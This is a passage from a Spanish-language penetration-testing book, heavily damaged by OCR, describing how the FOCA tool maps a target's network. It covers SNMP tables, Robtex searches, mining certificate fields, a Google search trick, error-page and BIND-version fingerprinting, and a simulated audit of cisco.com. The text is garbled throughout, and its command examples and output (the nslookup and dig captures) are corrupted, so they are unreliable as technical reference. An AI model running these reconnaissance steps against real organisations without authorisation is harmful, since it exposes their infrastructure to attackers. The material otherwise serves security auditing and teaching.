tabla  Cache  ARP  que  permite,  como  se  puede  ver  en  este  caso,  descubrir  los  segmentos  de  la  red 
interna,  los  equipos  conectados  y  sus  direcciones  fisicas.  Con  una  sencilla  consulta  se  realiza  un 
escaneo  a  la  red  interna  sin  necesidad  de,  ni  siquiera,  lanzar  un  ping. 

Para  conocer  mas  sob  re  el  equipo  y  el  entorno  donde  esta  conectado  y  asi  dibujar  mas  claramente  la 
estructura  de  la  red,  se  pueden  analizar  los  interfaces  que  tiene  el  sistema,  la  marca  y  el  modelo  -  que 
se  obtienen  en  la  informacion  de  sistema  la  tabla  de  enrutamiento  y  cualquier  tabla  dc  mapeo  de 
direcciones  fisicas  a  logicas,  entre  otros  muchos  datos.  Todos  estos  datos,  objetos  gestionados  en 
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liomcnclatura  SNMP,  se  encuentran  disponibles  en  la  MI  P-2  descrita  en  la  RFC  1213;  M1B  II  for 
Network  management  of  TCP/IP  based  internets 

De  esta  forma,  mediante  !a  eonsuha  de  la  tabla  de  enrutamiento  de  an  sistema  se  puede  conocer 
cuales  son  las  redes  conectadas  directamente  a  los  interfaces  del  equipo,  las  rutas  descubiertas 
mediante  protocolos  de  encaminamiento  eorno  OSPF  o  RIP  para  rutas  intemas  o  via  BGP  para 
sistemas  autdnomos,  ademas  de  los  nodos  de  conexion  entre  redes,  lo  que  permite  hacer  un  dibujo 
mas  detail  ado  dc  la  red  global. 

La  tabla  IPNetToMedia  tambien  muestra  information  similar  a  ia  Address  Translation  Table ,  en 
este  caso  traduciendo  de  direction  IP  a  direction  fisica,  con  lo  que  se  obtienen  de  nuevo  mapeos 
entre  MAC-IP  conocidos  por  el  sistema.  Dentro  de  esta  MIB  tambien  es  posible  acceder  a  la  tabla  de 
conexiones  de  un  equipo,  lo  que  permite  descubrir  que  otros  puertos  estan  abiertos  en  los  sistemas 
lo  que,  por  consiguiente,  desvelaria  servicios  en  ejecucion. 

Si  los  cquipos  con  un  agcnie  SNMP  activo  descubiertos  con  Shodan  hubieran  sido  servidores 
Microsoft  Windows ,  GNU/ Linux,  Novell  Netware  o  Solaris,  por  ejemplo,  tambien  seria  posible 
acceder  a  la  informacion  sobre  las  particiones,  las  interfaces  de  red,  el  software  en  ejecucion,  el 
software  instalado  o  los  usuarios  con  los  que  son  arrancados  determ inados  servicios,  entre  olra 
mucha  informacion.  Por  tanto,  tal  y  como  se  comentaba  previamente,  cs  muy  important©  revisar  los 
banner s  completes  que  FOCA  almacena  de  cada  uno  de  los  servidores  del  dominio  analizado,  ya  que 
pueden  contener  informacion  muy  interesante  para  las  siguientes  fases  de  la  auditoria. 


Robtex 

Robtex 7  es  un  servicio  web  descrito  por  sus  desarrolladores  como  la  navaja  Suiza  de  Internet,  ya  que 
permite  local izar  una  gran  cantidad  de  informacion  dc  un  dominio  objeti  vo  concreto,  como  son  otros 
sitios  web  alojados  en  el  mismo  servidor,  informacion  sobre  los  subdominios,  otras  direcciones  IP 
que  apuntan  al  dominio  analizado,  los  routers  a  los  que  esta  conectado  cada  uno  dc  los  servidores 
que  tienen  en  la  base  de  datos,  cl  sistema  autonomo  del  que  depende  el  segmento  analizado  o  si  e! 
dominio  auditado  se  encuentra  en  alguna  lista  negra,  por  nombrar  algunos  ejemplos.  Para  un  analisis 
en  detail  e  de  la  red  de  un  objeti  vo,  los  servicios  de  Robtex  son  fun  dam  en  tales. 

Robtex  recopila  todos  estos  datos  utilizando  arafias  que  se  conectan  a  diferentes  fuentes  publicas 
OS  I  NT  de  informacion  como  son  los  servidores  DNS,  los  feeds  de  informacion  de  los  sistemas  de 
enrutamiento  BGP  (Border  Gateway  Protocol,  el  protocolo  que  se  utiliza  por  los  sistemas  autonomos 
para  intercambiar  informacion  de  encaminamiento  entre  ellos)  o  como  el  servicio  Routing  Internet 
Service  de  RIPE* 

Tambien  obtiene  parte  de  estos  datos  dc  terceros,  como  Alexa  (que  ofrece  informacion  sobre  las 
visitas  que  recibc  cada  sitio  web  y  mantiene  un  ranking  por  palabra  clave,  categoria  o  pais),  Sedo  (un 
mercado  para  eomprar,  vender  o  aparcar  dominios)  o  RADb  (Routing  Assets  Database,  un  registro 
publico  de  informacion  de  encaminamiento  dc  redes  de  Internet), 


7  HTTP ;//ww w.Ro  btex,  com/ 
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La  informacion  almaeenada  en  Robtex  puede  ser  util  tambien  para  tratar  de  descubrir  los  servidores 
que  cumplen  mi  determinado  rol  en  una  organization  en  fundon  del  nornbre  que  tengan  dichos 
servidores,  o  para  encontrar  los  servidores  de  un  determiando  dominio,  taJ  y  como  se  muestra  en  la 
figura  03,21  donde  utilizando  una  busqueda  en  el  ti'tulo  de  los  resultados  con  el  nornbre  de  dominio 
se  obtienen  esos  dates. 


CO  www.robtex.com/q/yTq^intitlefnasa.gov" 

intitle:  "nasa. gcY'  JUicky;  [Seated  Co-Jgfe"'  Custom  Search 


Search  results  for  intitle: "nasa.gov" 


About  540  results  (0  16 
seconds) 

searchnasa.gov 

Apr  10:  2012  ...  search. nasa  gov 
has  two  fP  numbers 
(77.67.126.32,  77  67. 126.41). 
Both  are  on  the  same  IP 
network.  This  hostname  cnames 
to.. 

www  robtex.com 

ntona  sa.aov 

ntp  n  as  a  gov  has  one  tP  number 
(198.123.30.132).  via  cname  to 
ntp-nasa  arc  nasa  gov,  which 
also  has  a  corresponding  reverse 
pointer  You  . 
www  robtex  com 


nasa-qoveo 

Mar  2C  2012  ...  Com. nasa -gov. eg 
are  subdomains  to  this 
hostname.  You  might  also  be 
interested  in  similar  looking 
domain  names:  nasa-gov  cn, 
nasa -gov  us,, 
www. robtex  com 

webmail  nasa.gov 
webmaii  nasa.gov  has  one  ]P 
number  (193.117.1.43),  which 
also  has  a  corresponding  reverse 
pointer.  You  might  also  be 
interested  in... 
www. robtex  com 


Imagen  03.2 1 :  Descuhriendo  nuevos  dominion  con  Robtex, 


FOCA  utiliza  Robtex  de  diferentes  formas.  La  prim  era  de  ellas  como  forma  de  descubrir  servidores 
de  una  organizaciom  tal  y  como  se  ha  explicado  y  se  puede  ver  en  la  imagen  superior.  La  segunda 
de  las  man  eras  en  que  se  usa  es  para  descubrir  nuevos  servidores  en  los  mismos  segmentos  de  red, 
por  lo  que  una  vez  que  se  eneuentra  una  direction  IP  publica  perteneciente  al  dominio  auditado, 
se  lanza  un  proceso  de  scanning  de  todo  el  segmento  utilizando  Robtex,  lo  que  llevara  a  local izar 
servidores  en  dominios  relatives  a  I  dominio  objetivo.  La  ultima,  y  mas  evidente  forma,  consiste  en 
simplemente  obtener  information  de  una  direction  IP  localizada. 

Tanto  el  escaneo  de  PTR  explicado,  como  los  escaneos  de  Shodan  o  de  Robtex  en  un  dominio, 
son  opciones  que  el  auditor  puede  pedir  a  FOCA  que  re  a  lice  en  eualquier  momento.  Es  decir,  no 
es  necesario  que  se  haga  dentro  del  proceso  de  Network  Discovery?,  y  un  auditor  puede  anadir  en 
eualquier  momento  una  nueva  direccion  IP  manualmeote  a  FOCA  y  forzar  a  partir  de  ella  con  las 
opciones  de  menu  contextual  cualquiera  de  los  escaneos  previamente  explicados,  ademas  de  un 
traditional  escaneo  de  Ping  al  segmento. 
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Certificados  digitales 

Cada  vez  que  FOCA  encuentra  un  servidor  que  ofrece  el  servicio  web  la  aplieacion  trata  de  descargar 
el  certificado  digital  de  !a  conexion  HTTPS ,  ya  que  estos  certificados  pueden  contener  informacion 
que  ayude  al  programa  a  deseubrir  nuevos  dominies. 

Un  certificado  digital  es  un  documenlo  firmado  electronicamente  por  una  Autoridad  de  Certification 
que  permits  la  identification  del  titular  del  mismo,  y  son  utitizados  por  el  protocolo  HTTPS  para 
que  los  usuarios  puedan  verificar  que  estan  visitando  el  sitio  deseado  y  para  estableeer  una  conexion 
segura  entre  el  cliente  (el  navegador  del  usuario)  y  el  propio  servidor  web. 

Las  conexiones  HTTPS  se  encuentran  presenies  en  la  praelica  totalidad  de  los  sitios  de  comertio 
electron ico,  banca  online  o  administration  electronica,  y  cada  vez  son  mas  frecuentes  en  cualquier 
otro  servicio  web  que  requiera  la  autenticacion  del  usuario  para  tareas  de  administration  o  de  acceso 
a  la  informacion. 

Cuando  los  administradores  de  un  sitio  desean  eonseguir  un  certificado  digital  que  sea  utilizado  por 
sus  clicnies  para  validar  su  idenlidad,  deben  acudir  a  una  Entidad  o  Autoridad  de  Certificacion  para 
que,  tras  una  serie  de  comprobaciones,  ernita  y  firme  un  certificado  para  el  servidor.  C  ada  vez  que  un 
cliente  visite  el  sitio,  el  navegador  solicitara  al  servidor  que  le  envie  su  certificado  para  comprobar 
que  este  fue  firmado  por  una  Autoridad  de  Certificacion  en  la  que  conlla  y,  por  tanlo,  que  esta 
accediendo  al  servidor  correcto. 


Imagen  03.22:  Certificado  digital  del  dominio  army.mil. 
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Enire  losdatos  que  incorporan  los  certifieados  digitales  se  eneuentran  su nurnero de  serie,  la  Autoridad 
de  Ccrtificacion  que  lo  emitio,  el  periodo  de  validez,  la  clave  publica  del  titular  del  eertificado  y  un 
carnpo  que  puede  eontener  nombres  alleniativos  del  titular  del  mistno, 

En  el  ejemplo  que  se  muestra  en  la  imagen  03,23,  FOCA  ha  encontrado  este  servidor  web  del 
dorainio  army.mil  mediante  la  busqueda  de  documentos  y  ha  solidtado  el  eertificado  digital  de 
la  conexion  HTTPS .  Tal  y  eomo  puede  observarse,  consultando  el  valor  del  campo  mencionado 
FOCA  ha  descubierto  que  en  el  dominio  fcs.armv.mil  hay  un  eertificado  que  tambien  identifica  a 
w w w. bctinod.army.mil.  De  esta  forma,  FOCA  aftade  el  equipo  w  w  w.bctmod . arm v.mi  1  a  la  lista  de 
servidores,  y  en  su  dominio  aparecera  una  nota  informando  de  que  fuc  descubierto  mediante  tecnicas 
de  fingerprinting . 


Imagen  03.23:  In  format:  ion  del  eertificado  digital  del  dominio  di&a.  mi\. 


Otra  information  jugosa  que  puede  obtenerse  de  un  eertificado  digital  es  relativa  a  la  Certificate 
Revocation  List  ( CRL J,  que  puede  apuntar  a  un  servidor  de  la  organization  LDAP  o  HTTP  que 
contiene  la  lista  de  los  eerfificados  digitales  que  la  organizacion  ha  decidido  revocar.  Esto  puede 
llevar  al  descubrimiento  de  servidores  internos  del  dominio  objetivo  o  a  nuevos  segmentos  de  red. 
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Por  supuesto,  si  la  rata  que  aparece  en  el  certificado  digital  apunta  hacia  un  determinado  servidor 
LDAP una  de  las  cosas  que  se  pueden  hacer  a  colacion  es  la  de  intentar  conectarse  a  el  para  ver  que 
information  existe  en  el  que  de  forma  anonima  sea  ofrecida  a  todos  ios  usuarios  de  Internet  Para 
ello,  basta  con  utilizar  un  cliente  LDAP  para  conectarse, 

En  este  ejempio  se  hace  u so  de  la  popular  herramienta  LDAP  Browser,  gratuita,  con  la  que  se  puede 
realizar  la  conexion  de  forma  anonima  por  el  puerto  389  para  asi  hacer  un  posterior  analysis  de  la 
informacion  almacenada  en  el. 
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Imagen  03.24:  Concexian  LDAP  al  servidor  de  CRLs  descubieno  en  el  certificado  digital  do  disa.mil. 


La  informacion  de  los  servidores  que  gestionan  las  listas  CRL  actual mente  no  esta  siendo  extraida 
por  FOCA  -  aunque  siempre  estuvo  en  el  roadmap  pero  la  herramienta  genera  una  copia  de  todos 
los  certihcados  digitales  que  ha  encontrado  dentro  de  las  direcciones  del  dominio  en  una  carpeta  que 
se  genera  dentro  de  la  carpeta  del  proyecto  con  el  n ombre  Certificates. 

Alii  se  puede  acceder  a  todos  y  cada  uno  de  los  ceitificados  digitales  oblemdos,  y  estan  preparados 
para  poder  sufrir  un  proceso  de  anal i sis  posterior,  por  lo  que  se  podria  hacer  un  script  en  PowerShell 
o  Python  que  permitiera  extraer  la  lista  de  servidores  que  aparecen  en  los  campos  CRL  de  todos  los 
certihcados  localizados. 
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Google  Slash  Trick 

Otro  truce  que  in  corpora  FOCA  es  la  busqueda  en  Google  de  URLs  con  puerto  s  i4extrafios**  que 
esten  Index  ados  del  dominio  objetivo,  con  el  proposilo  de  poder  localizar  nuevos  servidores  o 
para  descubrir  nuevos  roles  de  los  servidores  ya  descubiertos,  pero  siempre  buscando  aquellos  que 
puedan  tener  una  especial  significance  para  la  seguridad. 

En  una  organ izacidn  donde  se  utilizan  puertos  como  777  o  2323  no  se  stielen  publicar  servicios 
normales,  ya  que  en  muchos  casos  los  clientes  no  podran  conectarse  por  las  medidas  de  seguridad 
de  la  red  desde  la  que  se  eonecten.  Hay  que  tener  presente  que  si  una  persona  se  quiere  conectar  a  un 
servicio  HTTP  publicado  por  el  puerto  777,  es  posible  que  no  lo  pueda  hacer  porque  en  el  firewall 
de  salida  solo  se  permita  trail co  HTTP  por  puerto  80  y  HTTPS  por  el  puerto  443  o  563,  asi  que  si 
aiguien  public  a  algo  en  puertos  raros  no  es  un  servicio  vtpara  el  gran  publico**  y  por  tanto  merece  una 
especial  atencion  para  un  auditor  de  seguridad. 

El  truco  de  la  barra  en  Google  es  bastante  curioso,  ya  que  si  se  hace  una  busqueda  sencilla  utilizando 
el  comodin  para  pedir  cualquier  Url  que  tenga  algo  despues  de  los  dos  puntos  -  lugar  donde  se  indica 
el  puerto  puede  comprobarse  que  Google  no  devuelve  ningun  resultado* 


Go  >gle 

Busqueda 

site:nt:7 

Todo 

Google  promotion 

Prueba  las  Herramientas  para  webmasters  de  Gooale 

www.googl  e  c  om/we  bmast  ers  / 

iEres  el  webmaster  de  nl:*/?  Con  sign  e  datos  de  indexation  y  ranking  de  Google. 

Imagen  es 

Maps 

Videos 

La  busqueda  de  site:nl:*/  no  obtuve  ningun  resultado. 

Motscias 

Sugerencias: 

Shopping 

Mas 

♦  Compmeba  que  iodas  las  palabras  estan  eserttas  corredamente. 

♦  intenta  usar  otras  patabras. 

♦  Intenta  usar  palabras  mas  generates 

Imagcn  03.25:  Busqueda  sin  resultados. 


A  priori  esto  podria  hacer  pensar  que  no  existe  nitiguna  Url  Index ada  en  Google  con  un  puerto 
identiiicado  despues  de  los  dos  puntos  y  esto  seria  un  error.  Aunque  estas  URLs  existan  en  la  base 
de  datos  de  Google,  esas  URLs  no  van  a  aparecer  hasta  que  se  aplique  un  caracter  especial  en  la 
consulta. 

Si  repetimos  3  a  consulta,  pero  ahora  se  anade  una  barra  a!  inicio  de  la  cadena  de  busqueda  que  se 
quiere  con  sultan  se  puede  com  probar  como  se  obtendran  URLs  con  todos  los  puertos  que  hay  an  sido 
Index adas  de  ese  dominio  en  la  base  de  datos  de  Google .  Curioso,  pero  cierto,  tal  y  como  se  puede 
comprobar  en  la  imagen  03.26  de  la  pagina  siguiente. 
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Go  >gle 

Busaueda 

siteVnl:*/ 

Apmximada mente  14  00 0  resultados  (0,07  seonndosl 

Start 

Todo 

msildoeicni  SV  *  Traducir  esta  pagina 

Imsgenes 

maandag  21  mei  2012.  g  lossy.  Inbggen.  Versie  2.2  0.  Vul  je  inloggegevens  in. 

Gebruikersnaam  Wachtwoord  Wachtwoord  vergeten? 

Maps 

Videos 

Noticiss 

topping 

H-SPHERE 

cp.diistemet  nl  3080/  *  Tradudr  esta  pagma 

Eigen  website?  domeinnaam  registratie  &  webhosting  voor  webhost  pakketten  ,n[  com 
domain  registratie 

Hoiomind:  Check  in  and  check  it  out! 

Mas 

www.hcloplanet.nl: 85/  ■  Traducir  esta  pagina 

Let  op:  Hob  mind  is  weer  terug  10  Holo's  online!  Register  gratis!  AJ  23.063  Holo's 
gin  gen  je  voor!  Welkom  op  Hobmind.  Chat,  maak  nieuwe  vnenden  en  ... 

Imagen  03  >26:  Miles  de  resultados  usando  el  Google  Slash  trick r 


Esta  comprobaci6n  hecha  per  FOCA ,  ademas  de  todo  el  proeeso  de  WehSearch  que  realiza  en  la 
primera  fase  del  algoritmo  de  Network  Discovery  genera  muchas  URLs  jugosas  para  un  auditor  de 
seguridad  en  un  proyecto  concrete. 


2.  Opciones  de  fingerprinting 

Las  tecnieas  de  fingerprinting  eonsisten  en  recoger  aquella  mformacidn  que  tambien  esta  accesible 
publicamente  pero  que  a  priori  no  puede  observarse.  Es  decir,  que  se  trata  de  inferir  information  a 
parti r  de  pruebas  que  se  real iz an  a  cada  uno  de  los  servicios  y  servidores  del  dominio  objetivo  para 
obtener,  por  ejemplo,  dates  sobre  el  nombre  y  la  version  del  servidor,  conocer  si  se  esta  utilizando 
un  servidor  de  aplicaciones  como  backend,  descubrir  si  el  servidor  de  base  de  datos  se  encuentra  en 
el  niismo  host  o  conocer  el  lenguaje  de  programacion  utilizado  en  una  aplieacidn. 

Por  ejemplo,  utilizando  un  simple  analtsis  mediante  una  utilization  especial  de  los  valores  en  un 
com  an  do  Ping  es  posible  tratar  de  descubrir  el  si  stem  a  operative  instalado  en  un  servidor  concrete  en 
funcion  de  las  respuestas  obtenidas  al  enviar  en  las  tramas  TPC/IP  valores  1  en  los  hits  de  urgencia, 
que  a  dia  de  hoy  no  van  a  ser  utilizados  por  el  sistema  operativo. 

Un  sistema  Microsoft  devueive  esos  valores  siempre  a  0,  debido  a  que  cuando  construve  una 
trama  TCP/IP  de  respues  t  a  lo  hace  desde  una  tiueva  trama.  Sin  embargo,  un  sistema  GNU /Linux 
construye  la  respuesta  a  partir  de  la  trama  de  petition,  por  lo  que  los  valores  tendran  el  valor  1 .  Este 
eomportamiento  hace  que  un  auditor  pueda  deducir,  con  un  poreentaje  alto  de  exito,  si  el  sistema 
operativo  objetivo  es  Microsoft  Windows  o  GNU/Limix. 
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Fingerprinting  con  banners  y  mensajes  de  error 

A  la  hora  de  realizar  fingerprinting  de  los  servidores  HTTP ,  FTP  o  SMTP  que  previa  rnente  hay  an 
side  localizados,  FOCA  in  corpora  v  arias  ope  i  ones  distintas  para  ideniificar  vers  ion  es  de  software 
corriendo  en  cada  uno  de  ellos. 


En  el  easo  de  un  servidor  web,  FOCA  analiza  en  primer  lugar  el  Banner  HTTP  tan  to  del  servicio 
web  que  responde  al  hostname ,  como  del  servicio  web  que  responde  a  una  petieion  realizada  sobre  la 
direction  IP  directamete  -  sin  usar  el  valor  de  hostname  Si  los  servidores  webs  cambian,  entonces 
podemos  estar  seguros  de  estar  frente  a  un  Reverse  Proxy  que  hace  de  frontera  en  esa  direecion  IP. 

FOCA  iambi  en  consulta  el  Banner  SMTP  de  los  servidores  de  correo  electronico  MX,  y  busea  el 
banner  de  los  servicios  FTP  en  todas  las  direcciones  IP  descubiertas.  Ademas  solieita  tambien  el 
banner  del  servicio  web  que  atiende  por  la  direecion  IP  pero  por  el  puerlo  HTTPS ,  y,  por  ultimo, 
consulta  Shodan ,  tratando  de  obtener  e  inferir  la  maxima  informacion  posible  de  cada  servidor. 

En  cuanto  a  los  mensajes  de  error,  un  seneillo  analisis  de  la  cabecera  HTTP  de  las  respuestas  que  un 
send  dor  ofrece  a  consultas  que  estan  mal  formadas  o  que  solicitan  recursos  que  no  existen,  permite 
obtener  informacion  muy  valiosa  sobre  el  servidor  audit  ado.  Con  estos  mensajes  de  error  404  en 
muchas  ocasiones  se  obtiene  informaeibn  mas  que  suficiente  como  para  saber  la  version  exacta 
de  un  sen  idor  web s  el  sistema  operative  sobre  el  que  se  ejecuta  e  incluso  algun  modulo  que  esta 
cargado  en  el. 


Much  os  administradores,  por  este  motivo,  a  la  hora  de  poner  en  produce  i6n  un  servidor  web  eontrolan 
el  mensaje  de  error  404  mostrando  un  niensaje  generico  en  su  lugar.  Sin  embargo,  cuando  se  solieita 
un  fichero  que  no  existe  pero  que  esta  vinculado  a  un  manejador  de  extensiones,  es  decir,  un  .aspx7 
un  jsp y  o  un  .cfm,  por  nombrar  algunos  ejemplos,  son  estos  frameworks  los  encargados  de  gestionar 
los  mensajes  de  error.  Y,  de  forma  habitual,  los  administr  adores  se  suelen  olvidar  de  modi  hear  l  os,  lo 
que  ofrece  much  a  informacion  sobre  el  servidor  web. 


<-  -»  e  rtl© 


^extefnat/3rfmaw/history/histfv,jsp 


&  * 


HTTP  Status  404  -  /  external /3dmaw/ history/ hi 


3E  Status  report 

/external/ 3d  maw/  history/ htstiy.tsp 

The  requested  resource  f/extemal/3dmaw/historv/pjstrvTtajl  is  not  available 


Tomcat/ 6^0^32 


TersbjLbmd  toEt=  ,,9i8.+Pln 


Iraagen  03.27:  Figerprinting  medianie  pcticiones  jsp. 


Per  este  motivo,  ademas  de  generar  y  estudiar  los  mensajes  de  error  403  y  404  trad  ic  ion  ales,  FOCA 
analiza  los  mensajes  404  de  JSP,  TPL,  ASP  y  CFM,  y  si  se  localiza  un  recurso  ,do7  un  recurso 
Server,  un  jsf  o  un  . servlet ,  el  program  a  tambien  trata  de  generar  errores  404  de  servidores  Java . 
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Fingerprinting  de  versiones  en  servidores  DNS 

Por  ultimo,  respecto  a  I  fingerprinting  de  los  servidores  DNS,  FOCA  tambien  incorpora  la  posibilidad 
de  consultar  el  registro  de  la  version  de  BIND  (Berkeley  Internet  Name  Domain ),  que  es  practicamente 
el  servidor  de  nombres  estandar  en  sistemas  UNIX  y  su  uso  esta  muy  general  iza do  tambien  en 
sistemas  GNU /Linux,  El  registro  version. bind  almaeena  informacion  sobre  la  ultima  actualization 
aplicada,  lo  que  puede  ser  util  para  conocer  si  un  determinado  servidor  no  se  encuemra  aeiualizado 
o  para  descubrir  una  politica  de  versiones  descoordinada  dentro  de  una  organ izae ion. 

Para  realizar  esta  comprobaeion  puede  utilizarse  la  herramienta  nslookup.  En  primer  lugar,  tras 
seleecionar  el  servidor  a  auditar,  es  neeesario  cambiar  la  dase  de  la  consulia  a  chaos.  Por  defecto  la 
dase  esta  configurada  eon  el  valor  in  (internet),  ya  que  es  la  dase  mas  comun  y  la  que  se  usa  para 
obtener  direcciones  IP  o  nombres  de  equipos.  A  continuation  es  neeesario  establecer  eomo  tipo  de 
registro  a  consultar  el  valor  txt  y,  por  ultimo,  so  Lie  i  tar  al  servidor  la  informacion  sobre  la  version  de 
BIND.  En  la  siguientc  figura  podemos  ver  la  version  de  BIND  utilizada  por  uno  de  los  servidores  de 
nombres  del  dominio  freehsd.org. 

>  nslookup 

>  server  ns2.isc-sns.com 

Defadt  server  ns2isc-sns.com 
Address:  3S.103 2 .1*3 

>  set  class=tliaos 

>  set  type=txt 

>  versbn.b  ind 

Server  ns2.isc-sns.com 
Address:  3S.  103.2 A#53 

Terra  mb  ind  text  -  M9,&4-Pr _ 

Imager  03.28:  Obtener  version  de  BIND  eon  ns  lookup. 

Los  usuarios  de  GNU /Linux  pueden  tambien  utilizar  el  programs  dig,  tal  y  como  se  muestra  en  la 
figura  03.29,  en  la  que  puede  observarse  como  los  administradores  de  los  servidores  DNS  de  RedHat 
tienen  un  gran  sentido  del  humor. 


dig  "Snsl.red  hat.com  version, bind  chaos  txt 

QUESTION  SECTION; 

;  version,  bind. 

CH 

TXT 

::  ANSWER  SECTION. 

version,  bind.  0 

CH 

TXT 

Imagen  03.29:  Obtener  version  de  BIND  con  dig. 
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Configuration  de  opciones  de  fingerprinting 

Todas  esta s  tecnicas  de  fingerprinting  y  reconocim  lento  de  tecnologias  pueden  personal  izarse 
desde  el  menu  OPTIONS  de  FOCA ,  tal  y  como  se  muestra  en  la  imagen  03.28,  en  las  pestanas 
Fingerprin  ting  y  Technology ,  re  spe  ct  i v  amente  * 


Imagen  03.30:  Opcioncs  dc  configtiracifin  de  fingerprinting  y  reconocimiento  de  teenologia. 

Hay  que  tener  presente  que  un  analisis  active  del  fingerprinting  de  HTTP  en  todos  los  servidores 
implicaria  que  euando  se  descubra  una  nueva  direccion  IP  o  un  nuevo  Hostname 9  FOCA  intentara 
localizar  un  servidor  weh  en  ella,  y  hacer  el  reconocimiento  de  software,  !o  que  puede  dar  buenos 
resultados  pero  incrementar  en  demasia  el  tiempo  de  ejecucion  del  proyecto. 

Esto  sucede  de  igual  forma  eon  el  proceso  de  fingerprinting  en  todos  los  servidores  de  servicios 
FTP  o  SMTP,  do  nde  real  men  te  apareceran  bastante  pocos.  Si  se  deja  e\  fingerprinting  pasivo,  FOCA 
reabzara  el  analisis  solo  euando  se  hay  a  detectado  previamente  un  servidor  FTP  o  SMTP  en  esa 
direccion  IP. 

Por  otro  I  ado,  la  parte  relativa  a  Technology  Recognition  indica  que  extensiones  se  buscaran  de 
forma  exp  lie  ita  euando  se  de  al  boton  de  “Technology  Recognition”  que  hay  en  todos  los  servidores 
detectados.  Eso  generara  una  busqueda  de  URLs  que  tengan  esas  extensiones,  y  ademas  generaran 
las  peticiones  HTTP  necesarias  para  generar  los  mensajes  de  error  404,  403  o  500  de  cada  una  de  las 
tecnologias  descubiertas. 
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3.  Vista  de  red  y  de  roles 

Para  mostrar  un  poco  de  la  potencia  y  la  eficacia  de  las  opciones  descritas  hasta  el  momento  en  este 
presente  capitulo  incluidas  en  FOCA  que  se  eentran  en  las  tareas  de  descubrimiento  de  red  se  va 
a  realizar  un  analisis  rapido  del  dominio  CISCO. com  simulando  que  se  esta  reaiizando  un  test  de 
intrusion  a  esta  empresa  como  parte  de  una  auditoria  de  seguridad,  pero  quitando  cualquier  opcion 
que  pudiera  ser  intrusiva,  y  dejando  solo  las  opciones  puramente  OSINT que  no  afectan  a  ninguno 
de  los  servicios  de  la  eompama. 

Como  primer  paso  de  un  test  de  penetracion,  una  vez  elegido  el  punto  de  ejecucion  del  test,  que  en 
este  caso  se  realizara  simulando  ser  un  usuario  extemo,  es  necesario  local  izar  el  maxi  mo  numero 
de  posibles  objetivos,  es  decir,  todos  los  servidores  y  servicios  (servidores  web,  de  FF;V,  de  correo, 
de  ficheros,  DNS >  etc.)  que  se  encuentran  accesibles  desde  el  punto  de  ejecucion  y  recoger  toda  la 
informacion  disponible  sobre  cada  uno  de  ellos. 

Para  ello,  lo  primero  que  hay  que  hacer  es  general  un  proyecto  nuevo  y  seleccionar  varias  opciones 
como  son: 

•  El  nombre  del  proyecto:  En  este  caso  podriamos  poner  CISCO 

•  El  nombre  del  dominio:  En  este  caso  sera  CISCO. com 

•  El  archive  del  proyecto:  Donde  se  guardara  la  informacion  del  proyecto 

•  El  directorio  de  trabajo:  Sera  una  carpeta  donde  se  almacenaran  tanto  los  archivos  descargados 
en  la  parte  de  metadatas,  como  donde  se  creara  la  carpeta  Certificates  y  se  almacenaran  los 
certificados  digitales  descubiertos. 

•  Opcion  de  autoguardado:  Si  se  quiere  ir  guardando  el  proyecto  cada  cierto  tiempo: 

•  Dominios  alternatives:  For  defecto  solo  se  pintail  los  servidores  y  la  informacion  relativa 

a  CISCO.com,  pero  si  se  quisiera  pintar  y  analizar  informacion  relativa  a  otro  dominio,  por 
ejemplo  CISCOxo.uk,  se  deberia  dar  de  alta  aqui  manual mente  esa  lista.  No  hay  problems, 
porque  esto  se  puede  configurar  mas  adelante  cuando  aparezean  en  Related  Domains  con  una 
opcion  del  menu  contextual  del  botdn  derecho. 

Una  vez  creado  cl  proyecto,  para  llevar  a  cabo  esta  fase  de  reconocimiento  de  objetivos  pueden 
utilizarse  las  tecnicas  de  descubrimiento  de  la  red  que  FOCA  incorpora,  y  que  pueden  personal izarse 
desde  la  seccion  Network  del  panel  principal.  Como  es  evidente,  tal  y  como  se  ha  comentado  ya, 
a  la  hora  dc  realizar  un  test  de  intrusion  es  fundamental  conseguir  un  conjunto  de  objetivos  io  mas 
grande  posible,  por  lo  que  el  auditor  podria  seleccionar  todas  las  opciones  disponibles:  web  Search, 
DNS  Search,  zone  transfer,  dictionary  Search.  IP  Bing,  PTR  scan  y  Shodan  <£  Rohtex. 

Para  lanzar  el  analisis,  tan  solo  es  necesario  pulsar  el  boton  Start  de  la  seccion  Network.  Pasado  el 
tiempo  suficiente  para  que  FOCA  realice  todas  operaciones  seleccionadas,  el  auditor  puede  consultar 
los  resultados  oblenidos  utilizando  la  vista  de  red,  en  la  que  se  muestra,  como  puede  observarse  en  la 
imagen  03.31 ,  que  FOCA  ha  localizado  608  servidores  para  el  dominio  analizado. 
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lmagen  03.31 :  Servidores  y  dominion  local  izados  en  el  an  alibis  de  la  red. 

Los  servidores  aparecen  organ  izados  por  redes  y  sub  redes,  y  es  posible  navegar  por  la  estructura 
para  ver  los  detail  es  de  cad  a  servidor  encontrado,  de  forma  que  el  pent  ester  pueda  conocer  como  se 
ha  conseguido  localizar  cada  equipo,  las  rutas  y  carpetas  descubiertas  en  eada  servidor  o  los  usuarios 
validos  que  han  sido  local  izados  para  eada  recurso,  entre  otra  gran  cantidad  de  informacion. 

Para  hacer  lo  menos  intrusive  el  proceso,  se  han  deshabililado  las  opciones  de  fingerprinting  en 
to  das  las  partes  de  los  servidores,  por  lo  que  no  aparece  n  ingun  icono  con  referencia  al  software 
corriendo  en  el  servidor  Si  se  hubieran  activado,  podriamos  ver  ieonos  de  Windows  Sewer,  Linux, 
Apache  o  las  diferentes  distribueiones  Linux  descubiertas. 

Para  que  al  auditor  le  resuhe  mas  sencillo  organizar  la  informacion  obtenida  y  plantear  las  siguientes 
fases  del  test,  FOCA  Iambi  en  ineorpora  una  vista  por  roles,  en  la  que  los  servidores  aparecen 
organ  izados  en  funcion  del  rol  que  el  programa  ha  inferido.  En  la  figura  03.3 1  pueden  observarse 
los  servidores  DNS ,  Active  Directory  y  los  cortafuegos  que  FOCA  ha  descubierto  para  el  dominio 
analizado. 
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Fmagen  03.32:  Vista  por  roles. 


Adetnas  de  todos  los  roles  que  han  si  do  identificados  por  FOCA ,  el  auditor  puede  detectar  por 
medio  de  otras  herramientas,  o  haciendo  inferencia  an  rol  especifico  para  alguno  de  ios  servidores 
desciibiertos,  y  por  ello  la  herranriienta  permite  tambicn  asignar  roles  de  forma  manual  simplemente 
seleecionando  el  servidor  y  usando  el  mend  contextual  del  boton  derecho. 


Imagen  03,33:  Anadir  roles  de  forma  manual. 


En  este  caso  concrete,  toda  ia  mformacion  que  se  ha  mostrado  de  este  proyecto  se  ha  eonseguido 
